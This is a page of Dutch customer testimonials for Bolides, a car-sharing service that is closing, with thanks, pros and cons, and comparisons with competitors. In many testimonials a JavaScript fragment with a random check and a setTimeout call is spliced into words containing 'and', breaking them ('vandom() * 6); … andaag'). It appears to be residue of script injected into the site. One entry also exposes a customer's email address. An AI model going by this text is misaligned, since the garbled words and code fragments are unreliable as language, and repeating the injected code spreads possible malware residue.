Altijd

Altijd een prettig contact en een prettige rit

Beste

Beste Car-sharing service die ik ken. Ik ben altijd een zeer tevreden klant geweest en fan van het opzet. Ik was een van de eerste gebruikers en ben dat tot vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag gebleven. Spijt dat jullie er mee stoppen.

Spijtig

Spijtig dat jullie er mee ophouden, het was altijd gemakkelijk en een plezier om bolides te gebruiken.

Jammer

Jammer dat jullie ermee stoppen. Merci voor de goede service!

Dank

Dank aan Bolides voor klantvriendelijkheid, flexibiliteit, plezante deelauto’s, en dat alles voor een vriendelijke prijs. Ik zal deze dienst missen.

Bedankt

Bedankt voor de services de afgelopen jaren. Spijtig dat jullie er mee moeten ophouden. De flexibiliteit was een grote troef voor iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and die slechts af en toe een auto nodig heeft.

Bolides

Bolides was een fantastische autodeel dienst die zich onderscheidde op vlak van kwaliteit met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere diensten. Wegens verhuis heb ik er na de beginperiode niet meer gebruik van kunnen maken. Toch is het zonde dat het nu eindigt.

Eerst

Eerst en vooral: doodjammer dat jullie er mee stoppen, wij zijn nog steeds fan. Pro: – Wagens waren altijd in uitstekende staat én proper – De Smart ForTwo is een geweldige auto voor korte verplaatsingen (de meerderheid) – Beschikbaarheid van de Smarts was uitstekend, op voorhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and reserveren was enkel voor de Fiats noodzakelijk – Verlengen kon altijd, wat goed is voor mensen zoals wij die niet graag alles op voorhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot op de minuut plannen – Het in/uitcheckproces met de app was na wat kinderziektes in het begin heel gemakkelijk – De service (bij problemen) was altijd uitstekend – Pay per use is een geweldig principe voor iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zoals ik die maar zelden een wagen nodig heeft Con: – Parkeren is in onze buurt een pijnpunt. Met de Smarts niet zo’n issue, met de Fiats wel. – In plaats van de Fiat 500x was een wagen met wat meer laadruimte en/of meer zitplaats handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andiger geweest. Wij vonden de Fiat 500x ook niet zo’n fijne wagen om mee te rijden. We hebben sinds enkele maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden ook een Cambio-abonnement, in hoofdzaak om af en toe ook een Berlingo of een camionette te kunnen gebruiken. Maar we waren geschrokken hoeveel slechter de service van Cambio is: – een bestelwagen reserveren doe je best een week op voorhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and – beschikbaarheid van de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere wagens is ook vaak een probleem – in geval van onvoorziene omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden zorgt het einduur van de reservatie voor stress – de wagens zijn in veel slechtere staat en vaak ronduit smerig – de omkadering (app, service, support…) is veel minder gebruiksvriendelijk Wat ons betreft is Cambio verre van een volwaardig alternatief. Hopelijk is GreenMobility beter. Bedankt voor de service de voorbije jaren en veel succes met het vervolgverhaal!

Ik

Ik vond het prettig om te rijden met een Audi (beter dan bijv Fiat). In het begin ging het verbinden niet altijd even vlot.

Jammer

Jammer dat jullie er mee stoppen. Ik maakte graag gebruik van jullie wagens als ik er een voor een paar uur nodig had.

– Tevreden van de klantendienst – Tevreden van de wagens en de netheid – In mijn herinnering: wat veel problemen gehad met het unlocken van wagens. Heel erg veel succes met jullie pivot en verdere uitbouw van flexifleet!

spijtig

spijtig dat jullie ermee stoppen voor mij waren jullie de beste! Carlo

Jammer

Jammer dat jullie stoppen. Het was een handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andige dienst, vlakbij, makkelijk in gebruik, auto’s altijd in orde. Het was fijn met jullie samen te werken. Veel succes met jullie nieuwe project.

nog

nog niet zo lang klant bij Bolides, maar wel positief ervaren….waarvoor dan, succes met de toekomstplannen. Stefaan

Goede

Goede dienst, sorry to see you go!

Ik

Ik was steeds tevreden van jullie dienstverlening!

Wat

Wat doen we met de tankkaart?

Veel

Veel succes nog! Bolides was een fijn concept!

Nieuw

Nieuw systeem nog niet getest dus heb nog niet meteen feedback vrees ik. Veel succes met het nieuwe project.

Jullie

Jullie hebben mij doen proeven van car sharing, en hebben mij 100% overtuigd. Ik heb mijn firmawagen omgeruild voor een mobiliteitsbudget, en heb er zo veel meer comfort voor bijgekregen. Veel succes. Tim

Bolides

Bolides was een fantastisch platform om op een efficiënte manier auto’s te delen. Het feit dat je auto’s ook op “privé” kon zetten om deze binnen de organisatie te delen maakt het platform uniek. Auto’s gingen niet altijd even vlot open en dicht, hier kan Bolides zeker nog in verbeteren.

Hey

Hey Bart, veel succes met de nieuwe plannen! We’ve enjoyed Bolides! Elke & Erik

Goed

Goed gedaan! Top job!

Zeer

Zeer tevreden! Top!!! Nooit problemen mee gehad. Mee gestopt na aankoop eigen wagen maar in toekomst misschien terug klant. Veel succes met alles wat jullie ondernemen!

Toffe

Toffe start-up! Het was enkel soms een beetje zoeken met de app (bv. na updates van de telefoon leek niet alles steeds nog te werken). Voor ons was dit tot voor onze verhuis de voordeligste optie om af en toe (aantal keer per jaar) een auto te kunnen gebruiken.

Ik

Ik rijd niet veel, maar heb altijd graag gebruik gemaakt van Bolides. Voor mij was dit een ideaal, hier geen vaste abonnementskosten waren. Mijn verbruik was occasioneel, maar als ik dit dan nodig had, wel meestal ver. Veel van de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere systemen hebben ofwel abonnementskosten en door de KMs die ik dan deed, zou ik in een hogere categorie vallen, òf mochten niet mee naar het buitenlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. De auto’s vond ik niet echt fijn. De smart was zeer lawaaierig, en warm in de zomer, de fiat reed ik niet graag mee. Wel jammer dat jullie ermee stoppen! Als alternatief zal ik nu waarschijnlijk green mobility gebruiken, gezien je met die auto’s ook naar het buitenlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and mag. Hopelijk is hun reach voldoende voor mijn gebruik….

Dankjewel

Dankjewel voor de kennismaking met carsharing!

Te

Te weinig auto’s in het straatbeeld tov bv Poppy

Zeker

Zeker een goede service, ik heb genoten van de smart, want het maakt het gemakkelijk om hem overal te parkeren!

mooi

mooi initiatief, kon alleen niet opboxen tegen de grotere vloten.

Eerste

Eerste keer dat ik het platform gebruikte, liep er iets mis met de reservatie.

Jammer

Jammer dat jullie stoppen. Ik heb altijd graag van Bolides gebruik gemaakt.

Bolide

Bolide is de max! Ik heb geen auto en dus is bolide perfect voor uitzonderingen

Wij

Wij zijn jaren klant geweest bij Bolides en waren er zeer tevreden mee en konden goed genieten van het aanbod.

Bedankt

Bedankt voor de ontwikkeling van een kwalitatieve autodeeloplossing.

Zo

Zo spijtig dat jullie ermee stoppen! Ik vond het heel gemakkelijk om Bolides te gebruiken. Bedankt! en succes met de nieuwe zaak!

Weten

Weten jullie al iets wat er gebeurt met mijn rij tegoed vriendelijke groeten frankschelfhaut@gmail.com

Super

Super correct! Succes met jullie nieuw pad!

leuke

leuke auto’s en personeel super !

Spijtig

Spijtig dat jullie ermee ophouden. Bolides was de perfecte aanvulling op het Poppy netwerk voor mij.

Spijtig

Spijtig maar ik had zo al een vermoeden omdat er zo goed als geen wagens meer beschikbaar waren in de app

Altijd

Altijd genoten van jullie uitmuntende service 😊

Classy

Classy Sharing Cars. Staan ook steeds mooi in het straatbeeld! 😉

Hallo! Jammer

Hallo! Jammer om te horen dat jullie autodeel-systeem ermee stopt. Ik heb jammer genoeg weinig de kans gehad te gebruiken omdat het kort na mijn aansluiting gestopt is in Gent. Toen al was ik verkocht door het gemak van jullie systeem (in tegenstelling tot veel andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere aanbieders). Succes met alles wat komt!

Fijn

Fijn autodeelsysteem! Toegankelijk en betaalbaar. De voordelen van cambio en poppy gecombineerd

bedankt

bedankt voor alles! Ik reed graag met jullie wagens, zelfs met de Fiat 500, ook al was ik initieel wat terughoudend. Jullie wagens waren ook altijd piekfijn in orde in vgl met de concurrenten. Succes met de nieuwe venture toegewenst!

Alle

Alle lof voor jullie welriekende neus voor autodelen, de durf en het inzicht om meer over klantbeleving na te denken. Als sporadische klant vond ik het een verademing om een wat meer vrije keuze te hebben in het autodeelaanbod.